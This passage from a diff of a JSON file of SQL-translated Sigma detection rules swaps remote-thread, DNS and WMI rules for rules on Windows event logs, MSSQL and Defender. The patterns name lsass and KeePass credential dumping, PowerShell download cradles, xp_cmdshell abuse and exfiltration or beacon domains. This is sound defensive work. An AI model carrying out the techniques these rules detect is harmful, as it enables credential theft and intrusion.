'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND ServiceName IN ('srservice', 'ipvpn', 'hkmsvc'))" ], - "filename": "create_remote_thread_win_cobaltstrike_process_injection.yml" + "filename": "win_system_apt_carbonpaper_turla.yml" }, { - "title": "CreateRemoteThread API and LoadLibrary", - "id": "052ec6f6-1adc-41e6-907a-f1c813478bee", - "status": "test", - "description": "Detects potential use of CreateRemoteThread api and LoadLibrary function to inject DLL into a process", - "author": "Roberto Rodriguez @Cyb3rWard0g", + "title": "Invoke-Obfuscation VAR+ Launcher - System", + "id": "8ca7004b-e620-4ecb-870e-86129b5b8e75", + "status": "experimental", + "description": "Detects Obfuscated use of Environment 
Variables to execute PowerShell", + "author": "Jonathan Cheong, oscd.community", "tags": [ "attack.defense_evasion", - "attack.t1055.001" + "attack.t1027", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (StartModule LIKE '%\\\\kernel32.dll' ESCAPE '\\' AND StartFunction = 'LoadLibraryA')" + "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND ImagePath LIKE '%cmd%' ESCAPE '\\' AND ImagePath LIKE '%\"set%' ESCAPE '\\' AND ImagePath LIKE '%-f%' ESCAPE '\\' AND (ImagePath LIKE '%/c%' ESCAPE '\\' OR ImagePath LIKE '%/r%' ESCAPE '\\'))" ], - "filename": "create_remote_thread_win_loadlibrary.yml" + "filename": "win_system_invoke_obfuscation_var_services.yml" }, { - "title": "Potential Credential Dumping Attempt Via PowerShell Remote Thread", - "id": "fb656378-f909-47c1-8747-278bf09f4f4f", + "title": "Suspicious Usage of CVE_2021_34484 or CVE 2022_21919", + "id": "52a85084-6989-40c3-8f32-091e12e17692", "status": "experimental", - "description": "Detects remote thread creation by PowerShell processes into \"lsass.exe\"", - "author": "oscd.community, Natalia Shornikova", + "description": "During exploitation of this vulnerability, two logs (Provider_Name:Microsoft-Windows-User Profiles Service) with EventID 1511 and 1515 (maybe lot of false positives with this event) are created. Moreover, it appears the directory \\Users\\TEMP is created may be created during the exploitation. 
Viewed on 2008 Server", + "author": "Cybex", "tags": [ - "attack.credential_access", - "attack.t1003.001" + "attack.execution" ], "falsepositives": [ - "Unknown" + "Corrupted user profiles - https://social.technet.microsoft.com/wiki/contents/articles/3571.windows-user-profiles-service-event-1511-windows-cannot-find-the-local-profile-and-is-logging-you-on-with-a-temporary-profile.aspx" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((SourceImage LIKE '%\\\\powershell.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND TargetImage LIKE '%\\\\lsass.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Application' AND EventID = '1511' AND Provider_Name = 'Microsoft-Windows-User Profiles Service')" ], - "filename": "create_remote_thread_win_winapi_in_powershell_credentials_dumping.yml" + "filename": "win_system_susp_vuln_cve_2022_21919_or_cve_2021_34484.yml" }, { - "title": "Remote Thread Creation in Suspicious Targets", - "id": "a1a144b7-5c9b-4853-a559-2172be8d4a03", - "status": "experimental", - "description": "Detects a remote thread creation in suspicious target images", - "author": "Florian Roth (Nextron Systems)", + "title": "Atera Agent Installation", + "id": "87261fb2-69d0-42fe-b9de-88c6b5f65a43", + "status": "test", + "description": "Detects successful installation of Atera Remote Monitoring & Management (RMM) agent as recently found to be used by Conti operators", + "author": "Bhabesh Raj", "tags": [ - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1055.003" + "attack.t1219" ], "falsepositives": [ - "Unknown" + "Legitimate Atera agent installation" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((TargetImage LIKE '%\\\\mspaint.exe' ESCAPE '\\' OR TargetImage LIKE '%\\\\calc.exe' ESCAPE '\\' OR TargetImage LIKE '%\\\\notepad.exe' ESCAPE '\\' OR TargetImage LIKE '%\\\\sethc.exe' ESCAPE '\\' OR TargetImage LIKE '%\\\\write.exe' ESCAPE '\\' OR TargetImage LIKE '%\\\\wordpad.exe' ESCAPE '\\' OR 
TargetImage LIKE '%\\\\explorer.exe' ESCAPE '\\') AND NOT ((StartFunction = 'EtwpNotificationThread') OR ((SourceImage LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE (Channel = 'Application' AND EventID = '1033' AND Provider_Name = 'MsiInstaller' AND Message LIKE '%AteraAgent%' ESCAPE '\\')" ], - "filename": "create_remote_thread_win_susp_targets.yml" + "filename": "win_software_atera_rmm_agent_install.yml" }, { - "title": "KeePass Password Dumping", - "id": "77564cc2-7382-438b-a7f6-395c2ae53b9a", + "title": "LPE InstallerFileTakeOver PoC CVE-2021-41379", + "id": "7dbb86de-a0cc-494c-8aa8-b2996c9ef3c8", "status": "experimental", - "description": "Detects remote thread creation in KeePass.exe indicating password dumping activity", - "author": "Timon Hackenjos", + "description": "Detects PoC tool used to exploit LPE vulnerability CVE-2021-41379", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1555.005" + "attack.initial_access", + "attack.t1190" ], "falsepositives": [ - "Unknown" + "Other MSI packages for which your admins have used that name" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE TargetImage LIKE '%\\\\KeePass.exe' ESCAPE '\\'" + "SELECT * FROM logs WHERE (Channel = 'Application' AND EventID = '1033' AND Provider_Name = 'MsiInstaller' AND Data LIKE '%test pkg%' ESCAPE '\\')" ], - "filename": "create_remote_thread_win_password_dumper_keepass.yml" + "filename": "win_vul_cve_2021_41379.yml" }, { - "title": "Bumblebee Remote Thread Creation", - "id": "994cac2b-92c2-44bf-8853-14f6ca39fbda", + "title": "Microsoft Malware Protection Engine Crash - WER", + "id": "6c82cf5c-090d-4d57-9188-533577631108", "status": "experimental", - "description": "Detects remote thread injection events based on action seen used by bumblebee", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "This rule 
detects a suspicious crash of the Microsoft Malware Protection Engine", + "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.execution", - "attack.t1218.011", - "attack.t1059.001" + "attack.t1211", + "attack.t1562.001" ], "falsepositives": [ - "Unknown" + "MsMpEng might crash if the \"C:\\\" partition is full" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((SourceImage LIKE '%\\\\wabmig.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\wab.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\ImagingDevices.exe' ESCAPE '\\') AND TargetImage LIKE '%\\\\rundll32.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Application' AND Provider_Name = 'Windows Error Reporting' AND EventID = '1001' AND Data LIKE '%MsMpEng.exe%' ESCAPE '\\' AND Data LIKE '%mpengine.dll%' ESCAPE '\\')" ], - "filename": "create_remote_thread_win_bumblebee.yml" + "filename": "win_application_msmpeng_crash_wer.yml" }, { - "title": "Password Dumper Remote Thread in LSASS", - "id": "f239b326-2f41-4d6b-9dfa-c846a60ef505", - "status": "stable", - "description": "Detects password dumper activity by monitoring remote thread creation EventID 8 in combination with the lsass.exe process as TargetImage.\nThe process in field Process is the malicious program. A single execution can lead to hundreds of events.\n", - "author": "Thomas Patzke", + "title": "Audit CVE Event", + "id": "48d91a3a-2363-43ba-a456-ca71ac3da5c2", + "status": "experimental", + "description": "Detects events generated by user-mode applications when they call the CveEventWrite API when a known vulnerability is trying to be exploited.\nMS started using this log in Jan. 
2020 with CVE-2020-0601 (a Windows CryptoAPI vulnerability.\nUnfortunately, that is about the only instance of CVEs being written to this log.\n", + "author": "Florian Roth (Nextron Systems), Zach Mathis", "tags": [ + "attack.execution", + "attack.t1203", + "attack.privilege_escalation", + "attack.t1068", + "attack.defense_evasion", + "attack.t1211", "attack.credential_access", - "attack.s0005", - "attack.t1003.001" + "attack.t1212", + "attack.lateral_movement", + "attack.t1210", + "attack.impact", + "attack.t1499.004" ], "falsepositives": [ - "Antivirus products" + "Unknown" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (TargetImage LIKE '%\\\\lsass.exe' ESCAPE '\\' AND StartModule = '')" + "SELECT * FROM logs WHERE (Channel = 'Application' AND Provider_Name IN ('Microsoft-Windows-Audit-CVE', 'Audit-CVE') AND EventID = '1')" ], - "filename": "create_remote_thread_win_password_dumper_lsass.yml" + "filename": "win_audit_cve.yml" }, { - "title": "Remote Thread Creation Ttdinject.exe Proxy", - "id": "c15e99a3-c474-48ab-b9a7-84549a7a9d16", + "title": "Microsoft Malware Protection Engine Crash", + "id": "545a5da6-f103-4919-a519-e9aec1026ee4", "status": "experimental", - "description": "Detects a remote thread creation of Ttdinject.exe used as proxy", - "author": "frack113", + "description": "This rule detects a suspicious crash of the Microsoft Malware Protection Engine", + "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1127" + "attack.t1211", + "attack.t1562.001" ], "falsepositives": [ - "Unknown" + "MsMpEng might crash if the \"C:\\\" partition is full" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE SourceImage LIKE '%\\\\ttdinject.exe' ESCAPE '\\'" + "SELECT * FROM logs WHERE (Channel = 'Application' AND Provider_Name = 'Application Error' AND EventID = '1000' AND Data LIKE '%MsMpEng.exe%' ESCAPE '\\' AND Data LIKE '%mpengine.dll%' ESCAPE '\\')" ], - "filename": 
"create_remote_thread_win_ttdinjec.yml" + "filename": "win_application_msmpeng_crash_error.yml" }, { - "title": "Suspicious Remote Thread Source", - "id": "66d31e5f-52d6-40a4-9615-002d3789a119", + "title": "Potential Credential Dumping Via WER - Application", + "id": "a18e0862-127b-43ca-be12-1a542c75c7c5", "status": "experimental", - "description": "Offensive tradecraft is switching away from using APIs like \"CreateRemoteThread\", however, this is still largely observed in the wild.\nThis rule aims to detect suspicious processes (those we would not expect to behave in this way like winword.exe or outlook.exe) creating remote threads on other processes.\nIt is a generalistic rule, but it should have a low FP ratio due to the selected range of processes.\n", - "author": "Perez Diego (@darkquassar), oscd.community", + "description": "Detects windows error reporting event where the process that crashed is lsass. This could be the cause of an intentional crash by techniques such as Lsass-Shtinkering to dump credential", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.privilege_escalation", - "attack.defense_evasion", - "attack.t1055" + "attack.credential_access", + "attack.t1003.001" ], "falsepositives": [ - "Unknown" + "Rare legitimate crashing of the lsass process" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((SourceImage LIKE '%\\\\bash.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\cvtres.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\cscript.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\defrag.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\dnx.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\esentutl.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\excel.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\expand.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\explorer.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\find.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\findstr.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\forfiles.exe' ESCAPE '\\' OR SourceImage LIKE 
'%\\\\gpupdate.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\hh.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\iexplore.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\installutil.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\lync.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\makecab.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\mDNSResponder.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\monitoringhost.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\msbuild.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\mshta.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\msiexec.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\mspaint.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\outlook.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\ping.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\powerpnt.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\provtool.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\python.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\robocopy.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\runonce.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\sapcimc.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\smartscreen.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\spoolsv.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\tstheme.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\userinit.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\vssadmin.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\vssvc.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\w3wp.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\winlogon.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\winscp.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\wmic.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\winword.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\wscript.exe' ESCAPE '\\') AND NOT ((SourceImage LIKE '%Visual Studio%' ESCAPE '\\' OR SourceParentImage LIKE '%\\\\Programs\\\\Microsoft VS Code\\\\%' ESCAPE '\\') OR (SourceImage LIKE 'C:\\\\Windows\\\\System32\\\\winlogon.exe' ESCAPE '\\' AND (TargetImage LIKE 
'C:\\\\Windows\\\\System32\\\\services.exe' ESCAPE '\\' OR TargetImage LIKE 'C:\\\\Windows\\\\System32\\\\wininit.exe' ESCAPE '\\' OR TargetImage LIKE 'C:\\\\Windows\\\\System32\\\\csrss.exe' ESCAPE '\\')) OR (SourceImage LIKE 'C:\\\\Windows\\\\System32\\\\winlogon.exe' ESCAPE '\\' AND TargetParentImage = 'System' AND TargetParentProcessId = '4') OR (SourceImage LIKE 'C:\\\\Windows\\\\System32\\\\provtool.exe' ESCAPE '\\' AND TargetParentProcessId = '0') OR (SourceImage LIKE '%\\\\git.exe' ESCAPE '\\' AND (TargetImage LIKE '%\\\\git.exe' ESCAPE '\\' OR TargetImage LIKE '%C:\\\\Windows\\\\System32\\\\conhost.exe' ESCAPE '\\')) OR (SourceImage LIKE 'C:\\\\Windows\\\\System32\\\\VSSVC.exe' ESCAPE '\\' AND TargetImage = 'System') OR (SourceParentImage LIKE 'C:\\\\Windows\\\\System32\\\\CompatTelRunner.exe' ESCAPE '\\') OR ((SourceImage LIKE 'C:\\\\Windows\\\\System32\\\\schtasks.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Windows\\\\SysWOW64\\\\schtasks.exe' ESCAPE '\\') AND TargetImage LIKE 'C:\\\\Windows\\\\System32\\\\conhost.exe' ESCAPE '\\') OR (SourceImage LIKE 'C:\\\\Windows\\\\explorer.exe' ESCAPE '\\' AND TargetImage LIKE 'C:\\\\Program Files\\\\NVIDIA Corporation\\\\NVIDIA GeForce Experience\\\\NVIDIA GeForce Experience.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'Application' AND Provider_Name = 'Application Error' AND EventID = '1000' AND AppName = 'lsass.exe' AND ExceptionCode = 'c0000001')" ], - "filename": "create_remote_thread_win_susp_remote_thread_source.yml" + "filename": "win_werfault_susp_lsass_credential_dump.yml" }, { - "title": "Accessing WinAPI in PowerShell. 
Code Injection", - "id": "eeb2e3dc-c1f4-40dd-9bd5-149ee465ad50", - "status": "test", - "description": "Detects the creation of a remote thread from a Powershell process to another process", - "author": "Nikita Nazarov, oscd.community", + "title": "Restricted Software Access By SRP", + "id": "b4c8da4a-1c12-46b0-8a2b-0a8521d03442", + "status": "experimental", + "description": "Detects restricted access to applications by the Software Restriction Policies (SRP) policy", + "author": "frack113", "tags": [ - "attack.execution", - "attack.t1059.001" + "attack.defense_evasion", + "attack.t1072" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((SourceImage LIKE '%\\\\powershell.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND NOT ((SourceParentImage LIKE 'C:\\\\Windows\\\\System32\\\\CompatTelRunner.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'Application' AND Provider_Name = 'Microsoft-Windows-SoftwareRestrictionPolicies' AND EventID IN ('865', '866', '867', '868', '882'))" ], - "filename": "create_remote_thread_win_powershell_code_injection.yml" + "filename": "win_software_restriction_policies_block.yml" }, { - "title": "CACTUSTORCH Remote Thread Creation", - "id": "2e4e488a-6164-4811-9ea1-f960c7359c40", - "status": "test", - "description": "Detects remote thread creation from CACTUSTORCH as described in references.", - "author": "@SBousseaden (detection), Thomas Patzke (rule)", + "title": "MSSQL XPCmdshell Option Change", + "id": "d08dd86f-681e-4a00-a92c-1db218754417", + "status": "experimental", + "description": "Detects when the MSSQL \"xp_cmdshell\" stored procedure setting is changed", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1055.012", - "attack.execution", - "attack.t1059.005", - "attack.t1059.007", - "attack.t1218.005" + "attack.execution" ], "falsepositives": [ - "Unknown" + "Legitimate enable/disable of the setting", + 
"Note that since the event contain the change for both values. This means that this will trigger on both enable and disable" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((SourceImage LIKE '%\\\\System32\\\\cscript.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\System32\\\\wscript.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\System32\\\\mshta.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\winword.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\excel.exe' ESCAPE '\\') AND TargetImage LIKE '%\\\\SysWOW64\\\\%' ESCAPE '\\' AND StartModule = '')" + "SELECT * FROM logs WHERE (Channel = 'Application' AND Provider_Name = 'MSSQLSERVER' AND EventID = '15457' AND Data LIKE '%xp\\_cmdshell%' ESCAPE '\\')" ], - "filename": "create_remote_thread_win_cactustorch.yml" + "filename": "win_mssql_xp_cmdshell_change.yml" }, { - "title": "PowerShell Rundll32 Remote Thread Creation", - "id": "99b97608-3e21-4bfe-8217-2a127c396a0e", + "title": "MSSQL Add Account To Sysadmin Role", + "id": "08200f85-2678-463e-9c32-88dce2f073d1", "status": "experimental", - "description": "Detects PowerShell remote thread creation in Rundll32.exe", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects when an attacker tries to backdoor the MSSQL server by adding a backdoor account to the sysadmin fixed server role", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.execution", - "attack.t1218.011", - "attack.t1059.001" + "attack.persistence" ], "falsepositives": [ - "Unknown" + "Rare legitimate administrative activity" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((SourceImage LIKE '%\\\\powershell.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND TargetImage LIKE '%\\\\rundll32.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Application' AND Provider_Name = 'MSSQLSERVER' AND EventID = '33205' AND Data LIKE '%object\\_name:sysadmin%' ESCAPE '\\' AND Data LIKE '%statement:alter server role 
[sysadmin] add member %' ESCAPE '\\')" ], - "filename": "create_remote_thread_win_susp_powershell_rundll32.yml" + "filename": "win_mssql_add_sysadmin_account.yml" }, { - "title": "Suspicious Scripting in a WMI Consumer", - "id": "fe21810c-2a8c-478f-8dd3-5a287fb2a0e0", + "title": "MSSQL Extended Stored Procedure Backdoor Maggie", + "id": "711ab2fe-c9ba-4746-8840-5228a58c3cb8", "status": "experimental", - "description": "Detects suspicious commands that are related to scripting/powershell in WMI Event Consumers", - "author": "Florian Roth (Nextron Systems), Jonhnathan Ribeiro", + "description": "This rule detects the execution of the extended storage procedure backdoor named Maggie in the context of Microsoft SQL server", + "author": "Denis Szadkowski, DIRT / DCSO CyTec", "tags": [ - "attack.execution", - "attack.t1059.005" + "attack.persistence", + "attack.t1546" ], "falsepositives": [ - "Legitimate administrative scripts" + "Legitimate extended stored procedures named maggie" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((Destination LIKE '%new-object%' ESCAPE '\\' AND Destination LIKE '%net.webclient%' ESCAPE '\\' AND Destination LIKE '%.downloadstring%' ESCAPE '\\') OR (Destination LIKE '%new-object%' ESCAPE '\\' AND Destination LIKE '%net.webclient%' ESCAPE '\\' AND Destination LIKE '%.downloadfile%' ESCAPE '\\') OR (Destination LIKE '% iex(%' ESCAPE '\\' OR Destination LIKE '%WScript.shell%' ESCAPE '\\' OR Destination LIKE '% -nop %' ESCAPE '\\' OR Destination LIKE '% -noprofile %' ESCAPE '\\' OR Destination LIKE '% -decode %' ESCAPE '\\' OR Destination LIKE '% -enc %' ESCAPE '\\') OR (Destination LIKE '%WScript.Shell%' ESCAPE '\\' OR Destination LIKE '%System.Security.Cryptography.FromBase64Transform%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'Application' AND Provider_Name = 'MSSQLSERVER' AND EventID = '8128' AND Message LIKE '%maggie%' ESCAPE '\\')" ], - "filename": "sysmon_wmi_susp_scripting.yml" + "filename": 
"win_mssql_sp_maggie.yml" }, { - "title": "DNS Query for Anonfiles.com Domain - Sysmon", - "id": "065cceea-77ec-4030-9052-fc0affea7110", + "title": "MSSQL SPProcoption Set", + "id": "b3d57a5c-c92e-4b48-9a79-5f124b7cf964", "status": "experimental", - "description": "Detects DNS queries for \"anonfiles.com\", which is an anonymous file upload platform often used for malicious purposes", - "author": "pH-T (Nextron Systems)", + "description": "Detects when the a stored procedure is set or cleared for automatic execution in MSSQL. A stored procedure that is set to automatic execution runs every time an instance of SQL Server is started", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.exfiltration", - "attack.t1567.002" + "attack.persistence" ], "falsepositives": [ - "Rare legitimate access to anonfiles.com" + "Legitimate use of the feature by administrators (rare)" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE QueryName LIKE '%.anonfiles.com%' ESCAPE '\\'" + "SELECT * FROM logs WHERE (Channel = 'Application' AND Provider_Name = 'MSSQLSERVER' AND EventID = '33205' AND Data LIKE '%object\\_name:sp\\_procoption%' ESCAPE '\\' AND Data LIKE '%statement:EXEC%' ESCAPE '\\')" ], - "filename": "dns_query_win_anonymfiles_com.yml" + "filename": "win_mssql_sp_procoption_set.yml" }, { - "title": "DNS HybridConnectionManager Service Bus", - "id": "7bd3902d-8b8b-4dd4-838a-c6862d40150d", - "status": "test", - "description": "Detects Azure Hybrid Connection Manager services querying the Azure service bus service", - "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", + "title": "MSSQL XPCmdshell Suspicious Execution", + "id": "7f103213-a04e-4d59-8261-213dddf22314", + "status": "experimental", + "description": "Detects when the MSSQL \"xp_cmdshell\" stored procedure is used to execute commands", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.t1554" + "attack.execution" ], 
"falsepositives": [ - "Legitimate use of Azure Hybrid Connection Manager and the Azure Service Bus service" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (QueryName LIKE '%servicebus.windows.net%' ESCAPE '\\' AND NewProcessName LIKE '%HybridConnectionManager%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Application' AND Provider_Name = 'MSSQLSERVER' AND EventID = '33205' AND Data LIKE '%object\\_name:xp\\_cmdshell%' ESCAPE '\\' AND Data LIKE '%statement:EXEC%' ESCAPE '\\')" ], - "filename": "dns_query_win_hybridconnectionmgr_servicebus.yml" + "filename": "win_mssql_xp_cmdshell_audit_log.yml" }, { - "title": "Suspicious Cobalt Strike DNS Beaconing - Sysmon", - "id": "f356a9c4-effd-4608-bbf8-408afd5cd006", - "status": "test", - "description": "Detects a program that invoked suspicious DNS queries known from Cobalt Strike beacons", - "author": "Florian Roth (Nextron Systems)", + "title": "MSSQL Disable Audit Settings", + "id": "350dfb37-3706-4cdc-9e2e-5e24bc3a46df", + "status": "experimental", + "description": "Detects when an attacker calls the \"ALTER SERVER AUDIT\" or \"DROP SERVER AUDIT\" transaction in order to delete or disable audit logs on the server", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.command_and_control", - "attack.t1071.004" + "attack.defense_evasion" ], "falsepositives": [ - "Unknown" + "This event should only fire when an administrator is modifying the audit policy. 
Which should be a rare occurrence once it's set up" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((QueryName LIKE 'aaa.stage.%' ESCAPE '\\' OR QueryName LIKE 'post.1%' ESCAPE '\\') OR QueryName LIKE '%.stage.123456.%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Application' AND Provider_Name = 'MSSQLSERVER' AND EventID = '33205' AND (Data LIKE '%statement:ALTER SERVER AUDIT%' ESCAPE '\\' OR Data LIKE '%statement:DROP SERVER AUDIT%' ESCAPE '\\'))" ], - "filename": "dns_query_win_mal_cobaltstrike.yml" + "filename": "win_mssql_disable_audit_settings.yml" }, { - "title": "DNS Query for Ufile.io Upload Domain - Sysmon", - "id": "1cbbeaaf-3c8c-4e4c-9d72-49485b6a176b", + "title": "MSMQ Corrupted Packet Encountered", + "id": "ae94b10d-fee9-4767-82bb-439b309d5a27", "status": "experimental", - "description": "Detects DNS queries to \"ufile.io\". Which is often abused by malware for upload and exfiltration", - "author": "yatinwad and TheDFIRReport", + "description": "Detects corrupted packets sent to the MSMQ service. 
Could potentially be a sign of CVE-2023-21554 exploitation", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.exfiltration", - "attack.t1567.002" + "attack.execution" ], "falsepositives": [ - "Legitimate DNS queries and usage of Ufile" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE QueryName LIKE '%ufile.io%' ESCAPE '\\'" + "SELECT * FROM logs WHERE (Channel = 'Application' AND Provider_Name = 'MSMQ' AND EventID = '2027' AND Level = '2')" ], - "filename": "dns_query_win_ufile_io.yml" + "filename": "win_msmq_corrupted_packet.yml" }, { - "title": "Regsvr32 Network Activity - DNS", - "id": "36e037c4-c228-4866-b6a3-48eb292b9955", - "status": "test", - "description": "Detects network connections and DNS queries initiated by Regsvr32.exe", - "author": "Dmitriy Lifanov, oscd.community", + "title": "Windows Defender Threat Detection Disabled", + "id": "fe34868f-6e0e-4882-81f6-c43aa8f15b62", + "status": "stable", + "description": "Detects disabling Windows Defender threat protection", + "author": "Ján Trenčanský, frack113", "tags": [ - "attack.execution", - "attack.t1559.001", "attack.defense_evasion", - "attack.t1218.010" + "attack.t1562.001" ], "falsepositives": [ - "Unknown" + "Administrator actions (should be investigated)", + "Seen being triggered occasionally during Windows 8 Defender Updates" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE NewProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\'" + "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-Windows Defender/Operational' AND EventID IN ('5001', '5010', '5012', '5101'))" ], - "filename": "dns_query_win_regsvr32_network_activity.yml" + "filename": "win_defender_disabled.yml" }, { - "title": "Potential Compromised 3CXDesktopApp Beaconing Activity - DNS", - "id": "bd03a0dc-5d93-49eb-b2e8-2dfd268600f8", - "status": "experimental", - "description": "Detects potential beaconing activity to domains related to 3CX 3CXDesktopApp compromise", - "author": 
"Nasreddine Bencherchali (Nextron Systems)", + "title": "PSExec and WMI Process Creations Block", + "id": "97b9ce1e-c5ab-11ea-87d0-0242ac130003", + "status": "test", + "description": "Detects blocking of process creations originating from PSExec and WMI commands", + "author": "Bhabesh Raj", "tags": [ - "attack.command_and_control" + "attack.execution", + "attack.lateral_movement", + "attack.t1047", + "attack.t1569.002" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (QueryName LIKE '%akamaicontainer.com%' ESCAPE '\\' OR QueryName LIKE '%akamaitechcloudservices.com%' ESCAPE '\\' OR QueryName LIKE '%azuredeploystore.com%' ESCAPE '\\' OR QueryName LIKE '%azureonlinecloud.com%' ESCAPE '\\' OR QueryName LIKE '%azureonlinestorage.com%' ESCAPE '\\' OR QueryName LIKE '%dunamistrd.com%' ESCAPE '\\' OR QueryName LIKE '%glcloudservice.com%' ESCAPE '\\' OR QueryName LIKE '%journalide.org%' ESCAPE '\\' OR QueryName LIKE '%msedgepackageinfo.com%' ESCAPE '\\' OR QueryName LIKE '%msedgeupdate.net%' ESCAPE '\\' OR QueryName LIKE '%msstorageazure.com%' ESCAPE '\\' OR QueryName LIKE '%msstorageboxes.com%' ESCAPE '\\' OR QueryName LIKE '%officeaddons.com%' ESCAPE '\\' OR QueryName LIKE '%officestoragebox.com%' ESCAPE '\\' OR QueryName LIKE '%pbxcloudeservices.com%' ESCAPE '\\' OR QueryName LIKE '%pbxphonenetwork.com%' ESCAPE '\\' OR QueryName LIKE '%pbxsources.com%' ESCAPE '\\' OR QueryName LIKE '%qwepoi123098.com%' ESCAPE '\\' OR QueryName LIKE 